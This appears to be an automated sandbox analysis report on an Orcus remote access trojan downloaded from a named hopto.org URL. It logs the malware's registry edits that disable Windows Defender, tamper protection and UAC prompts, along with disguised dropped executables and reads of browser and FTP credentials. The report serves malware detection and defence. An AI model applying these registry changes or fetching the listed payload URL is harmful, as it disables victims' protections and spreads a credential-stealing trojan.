Analysis Overview
Threat Level: Known bad
The file https://njratnik667.hopto.org/1.exe was found to be: Known bad.
Malicious Activity Summary
Orcus
Orcus family
Modifies Windows Defender Real-time Protection settings
UAC bypass
Contains code to disable Windows Defender
Orcurs Rat Executable
Command and Scripting Interpreter: PowerShell
Windows security modification
Reads WinSCP keys stored on the system
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Hijack Execution Flow: Executable Installer File Permissions Weakness
Looks up external IP address via web service
Checks whether UAC is enabled
Checks installed software on the system
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Subvert Trust Controls: Mark-of-the-Web Bypass
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
NTFS ADS
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Modifies data under HKEY_USERS
System policy modification
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-01-14 20:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-14 20:36
Reported
2025-01-14 20:39
Platform
win11-20241007-en
Max time kernel
177s
Max time network
178s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\dllhost.exe | N/A |
Orcus
Orcus family
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\dllhost.exe | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\Downloads\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsInput.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsInput.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Windows\dllhost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Hijack Execution Flow: Executable Installer File Permissions Weakness
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" | C:\Windows\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.DXGI.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsInput.exe | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File created | C:\Windows\SysWOW64\WindowsInput.InstallState | C:\Windows\SysWOW64\WindowsInput.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.Direct3D11.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.Direct3D9.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\TurboJpegWrapper.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\x86\turbojpeg.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsInput.exe.config | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Windows\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File opened for modification | C:\Windows\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File created | C:\Windows\dllhost.exe.config | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File opened for modification | C:\Windows\dllhost.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\dllhost.exe.config | C:\Windows\system32\attrib.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\Downloads\1.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\System32\Taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\Taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\Taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\dllhost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133813606234500201" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\MuiCache | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Downloads\1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\Downloads\1.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" | C:\Windows\dllhost.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://njratnik667.hopto.org/1.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8fa0fcc40,0x7ff8fa0fcc4c,0x7ff8fa0fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1824 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1992,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2004 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2044,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2324 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4384,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4528,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3744 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
